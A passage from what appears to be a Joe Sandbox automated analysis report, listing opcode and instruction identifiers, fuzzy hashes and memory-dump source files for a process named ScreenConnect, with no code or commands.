                                                                                                                                                                                                                                                    • Opcode ID: ab5b919424c7eb2ddc321c3a1d6e05bbfb9da6fe00ae776df90cf523ef414b9e
                                                                                                                                                                                                                                                    • Instruction ID: 18066f1bf5ce588e9ea997821a6404d76db779c5bcd9fdc72f3a43994eca004c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ab5b919424c7eb2ddc321c3a1d6e05bbfb9da6fe00ae776df90cf523ef414b9e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28312531B002015B8B09AB7DA85095E7BEAFF8962070456B9D409DB359EF74ED09CBD1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                                                                    • API String ID: 0-1334834377
                                                                                                                                                                                                                                                    • Opcode ID: b1678e8c4b40c09673e9879107f4bd2ee7c9494eb0fa656c1ffa10ea13ef9b03
                                                                                                                                                                                                                                                    • Instruction ID: 98ba23ae3589e491afe7f4847455a63e5f34509e4fa442d4d2139774ba28b697
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b1678e8c4b40c09673e9879107f4bd2ee7c9494eb0fa656c1ffa10ea13ef9b03
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C31F231B402024B8B09AB7DA85096EB7EAFFC8720700957DD409EB358EF74ED098BD1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: LR]q
                                                                                                                                                                                                                                                    • API String ID: 0-3081347316
                                                                                                                                                                                                                                                    • Opcode ID: 5440e4854295df79112e89e52ccb2556b4ac90fb047e3b721c02e099373c1213
                                                                                                                                                                                                                                                    • Instruction ID: 3642d7cf01b438cd24e93bd9be7b57eb28b40b30e223dd194f99757111a9505d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5440e4854295df79112e89e52ccb2556b4ac90fb047e3b721c02e099373c1213
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D921F731B00104DBDB18AE6AC855BAE7EB6FBD8B10F08446CF106A7290EF709C41C751
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: $]q
                                                                                                                                                                                                                                                    • API String ID: 0-1007455737
                                                                                                                                                                                                                                                    • Opcode ID: 8aa92eeaee070e2053cc22bca615838de9f52eb05b41ddd663f9172139b6e482
                                                                                                                                                                                                                                                    • Instruction ID: 349ff10f8876a3f611ea706fa8738dbbbc6000454415cc6415b95b21da1556ce
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8aa92eeaee070e2053cc22bca615838de9f52eb05b41ddd663f9172139b6e482
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7E0C270788241CFD73ACF2CD8919417BB4FF01A0235500EADA44CB273D321E842C701
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6af1be79868dc8420ae03911f899637d88741be3f1c99b57d0da84b45002d3b3
                                                                                                                                                                                                                                                    • Instruction ID: b0b6c81b3b60f04a0deebdc0c664cd063f0a6de32a458ebb8f765eef0e087500
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6af1be79868dc8420ae03911f899637d88741be3f1c99b57d0da84b45002d3b3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51F0A032608384AFCB055B6898558693FAADE9B11030C48FFD149DF262DA26AC068791
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7278ef3413fbf991c1af62ffb5c1b550dd598cbde15e5e4d04ce7bbf0aa94979
                                                                                                                                                                                                                                                    • Instruction ID: 4a3a651fa727b5dc037279daf68f645afaf19e3461e6a78cac9e5ff409c4f5de
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7278ef3413fbf991c1af62ffb5c1b550dd598cbde15e5e4d04ce7bbf0aa94979
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F0147B3A0C3C05FC7024B2888615663FA6DF9711170D04EBC495CF2A3DA18D807C3E1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3301424241.00000000060D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060D0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_60d0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 31e5eaced66e10472ea0f76d2a6bf8e9606df5c56e01ad24a6370d2ffe469701
                                                                                                                                                                                                                                                    • Instruction ID: ef2b68fb6dd0e3a5c282119008a9d99a3cde9f6762870bd4db0352adf4a00a90
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31e5eaced66e10472ea0f76d2a6bf8e9606df5c56e01ad24a6370d2ffe469701
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 85F13935A10719CFCB54DF68C850A99BBF2FF89310F108699D549AB221EB70EE85CF81
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 651967d57823df9ac3c9e3b7d92390e060426d11c514855094caecf83090ce7d
                                                                                                                                                                                                                                                    • Instruction ID: 6b5c68384ba4f0f8ba1a1ca1f97129925250c3a497ba7c634a22e8603b21e2b9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 651967d57823df9ac3c9e3b7d92390e060426d11c514855094caecf83090ce7d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0A12534B002058FDB18DFA8C594AADBBF6EF88710F1481A9E506AB364DB74EC45CF90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: daeb3d7edfbcd3c5d4404cbe6c90c0b0aee8af3ffc9fb2e70caabe2bd089e466
                                                                                                                                                                                                                                                    • Instruction ID: ecf8d955c84bce19738f8a0432fcca553fb6409eeb9b173284c11133ff391110
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: daeb3d7edfbcd3c5d4404cbe6c90c0b0aee8af3ffc9fb2e70caabe2bd089e466
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D1A12934B402058FDB18DFA8C594A9DBBF6EF88710B1485A9E506EB364DB35EC46CF90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 47a91f15804aa7dd34669ad42bbbf2d5bcf69ba9db828c13cc5289502df0657e
                                                                                                                                                                                                                                                    • Instruction ID: 474f5814d2e8e8cbc0939567072028cc32fc032287e6380aeace1bd41605db98
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 47a91f15804aa7dd34669ad42bbbf2d5bcf69ba9db828c13cc5289502df0657e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0A518D34B002058FDB19DF6CD59496ABBEAFF8830471485ADE54ACB366DB34EC06CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8c493db03da99af4a86d6d20f1672d2777000dfd20d5fdbf901a1ca4818d84be
                                                                                                                                                                                                                                                    • Instruction ID: 46dd3d24d4a6099872bec6ca96b81a47cba7784a8daf4c0f4ecbb1be4964b8c3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c493db03da99af4a86d6d20f1672d2777000dfd20d5fdbf901a1ca4818d84be
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF51E1746047408FC738DF69D880596BBF5EF86720B044AADD096CB6A6D734E90BCBC0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 2cf3780e77e27738dfa771879c0953085beb18edc964598974a2f44b84c76ab4
                                                                                                                                                                                                                                                    • Instruction ID: 13d73acf7a71b3cbac2fe997977012b6f9048cdd45aa6864c7d857a993425a6f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2cf3780e77e27738dfa771879c0953085beb18edc964598974a2f44b84c76ab4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20514D34B002058FDB18DF6CD99492ABBEAFF8830471485A9E54ADB365DB74EC06CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1f1554ce19558ee06d21f885e69ca81641b94670272cf18be9ac406ab3071414
                                                                                                                                                                                                                                                    • Instruction ID: f97aaace72217b711728769d70ae60d5e22dcfc9ded9937dd8dca03d5395dfad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1f1554ce19558ee06d21f885e69ca81641b94670272cf18be9ac406ab3071414
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65512A34600601CFD728DF29D98495AB7F2FF8D725B245A6CE49A9B7A4DB31F806CB40
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: f322b0e2b305c50b0060923035d191f95b05035e1107ba891730787563a584ba
                                                                                                                                                                                                                                                    • Instruction ID: 68c7384bbb72668babfe3baee2b73007768a8a1c8780f8ecd9d309a74a8c2f0b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f322b0e2b305c50b0060923035d191f95b05035e1107ba891730787563a584ba
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C51BE30E403098FDB05DFB9D944B9DBBB5FF89300F1085A9E404BB295DB78A885CB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 7110ae4bccaed907d904e7cb14823a2e519c29a7a0a8921c98e754c3d3b5598e
                                                                                                                                                                                                                                                    • Instruction ID: 61e1e16697e1aadc98f2f4b7fac9bdf4f0b30ac2f02566108ceca481929e7fd0
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7110ae4bccaed907d904e7cb14823a2e519c29a7a0a8921c98e754c3d3b5598e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 25518E70E403099FDB05DFA5D944BDDBBB5FF88300F5085A9E504BB254DB78A986CB50
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 11402537694d019e7a54bc71f6723c06db1691064f6ed74b0bb12ff51d34a114
                                                                                                                                                                                                                                                    • Instruction ID: 89fc0b654861719be2b440744e6162ec5a32d286bc14938ca096e8ce075833be
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 11402537694d019e7a54bc71f6723c06db1691064f6ed74b0bb12ff51d34a114
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4415771E002199BDB18DFA5C980AEEBBF6FF89B00F14816DD505B7240DB74AD46CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a696733ccf2b95d50d6d764bd4fca705d9bfa921fc1f094cb17e8a056aa69818
                                                                                                                                                                                                                                                    • Instruction ID: 9d1f65799c976b9beebe01b5720e59aba023aa3fa80bf4b0bb717c03f8e8a7ad
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a696733ccf2b95d50d6d764bd4fca705d9bfa921fc1f094cb17e8a056aa69818
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27416B306102058FDB18DB69D854AADBBE6FF88B14B1485ADE406EB361DF74AD06CB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 0612417c65bd86e8eea313c1a23521f9f3007bb8b8a51fb1c2db4e45176684da
                                                                                                                                                                                                                                                    • Instruction ID: 731472465718e80f1fef195a7a6363bb09cec299c3bbe9342ed3052193917c4e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0612417c65bd86e8eea313c1a23521f9f3007bb8b8a51fb1c2db4e45176684da
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A931AF30B102058FEB189FA9C4546AEFBF6EF89754F1094AEE506E7264DF70DD018B90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: eb4d75c0887641fbc387a07bfdf49edf7d7f96b5208b1b8903007cdef8a7721a
                                                                                                                                                                                                                                                    • Instruction ID: 48c571cabd9c325a35f1965b2131beb2cc5f2a44a6e2253c9b4ebd1a675b5839
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: eb4d75c0887641fbc387a07bfdf49edf7d7f96b5208b1b8903007cdef8a7721a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B94129307102158FDB18DB69D854AADBBE6EF88B14B1485ADE406EB3A0DF74AD05CB90
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 26ee45c2422ac6aafc445fcd05f936485ca030ccabe12b80a907635e934f900a
                                                                                                                                                                                                                                                    • Instruction ID: bb9effb444759af30e81b1039e9ddc96392c4b4fd9ac0db036f40d43f6c55499
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 26ee45c2422ac6aafc445fcd05f936485ca030ccabe12b80a907635e934f900a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A121F7716092809FD70AC728D491A95BF65EF57324B29C0DFD485CF1A3C72AD807C751
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: a24cb2ca5302615f0ed0d0c1b3d96d6824c3cf3dd5d0a7a41b3861c14a648165
                                                                                                                                                                                                                                                    • Instruction ID: 4312b8f6a43f2b00329acf1a6e1006b93999601c52eaf71e1060b808b5df72ac
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a24cb2ca5302615f0ed0d0c1b3d96d6824c3cf3dd5d0a7a41b3861c14a648165
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE313A30A007058FD734DF2AC844A6ABBF5EF89714B144A6CE456DB7A5D730E946CF80
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d62e4addb06599feca7168709c6c1ee9caaee34713483c09191c5b11e1b8a377
                                                                                                                                                                                                                                                    • Instruction ID: 5f976864840615fa2e968a12d55ad74b69c30f07629826d4c80b6ca820ad8776
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d62e4addb06599feca7168709c6c1ee9caaee34713483c09191c5b11e1b8a377
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FB318BB1D002099FCB18DFA9C444AEEBFF5EF88310F10846ED549A7251DB78A945CFA4
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 8431336a2b0b111160da38b877fb8a0f82e369978c716ebe0371aff72159e4f0
                                                                                                                                                                                                                                                    • Instruction ID: 670876a6646b1f9c7e9fce81c1bb0c72215abaa347bec6330cbb5214be3bed77
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8431336a2b0b111160da38b877fb8a0f82e369978c716ebe0371aff72159e4f0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EC313934A00B058FC734DF6AD84466ABBF1EF89720B104B6DD0969B6A5D770E94ACFC0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 6f1cfb05b9e45ea2cb7f3cd8fea380f97402f821a9ec997f76e39ec00b8b1f2b
                                                                                                                                                                                                                                                    • Instruction ID: 340f82ca2a9d71a1c587a883f354261075c39ffbff40ba24b7ec42d2ce8d508d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6f1cfb05b9e45ea2cb7f3cd8fea380f97402f821a9ec997f76e39ec00b8b1f2b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 55317E30600701CFD734DF29D88896AB7F1EF89B14B144A5CD456DB3A4D730E906CB91
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 5860ccc90d60d90f12870a81d279c9df43d09a04ea006e4694827c1520ff9e2c
                                                                                                                                                                                                                                                    • Instruction ID: 103222c0ab59aad55f1dca024553b79813be87190a217583870d02c82879bfd3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5860ccc90d60d90f12870a81d279c9df43d09a04ea006e4694827c1520ff9e2c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D3109346007018FDB34DF6AC84466ABBF1EF99720B104A6DD5569B7A5D730E946CFC0
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 9ae19061bbba420e3acac56a1c077d15eb27b537371da2095a95e40baabf3cb1
                                                                                                                                                                                                                                                    • Instruction ID: 37cb6febaec906ffe250be3753c09c7352d9492583d713c1cc1b084b3a77b491
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9ae19061bbba420e3acac56a1c077d15eb27b537371da2095a95e40baabf3cb1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 63313E30A00245CFCB19EF74D94886EBBB5FF09316B1086EAD919CB2A2CB34AD01CB51
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3289406615.0000000001BC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01BC0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_1bc0000_ScreenConnect.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 302a912c8875c19e9af85aa616509c844aa24daa43639f9117957346695f0394
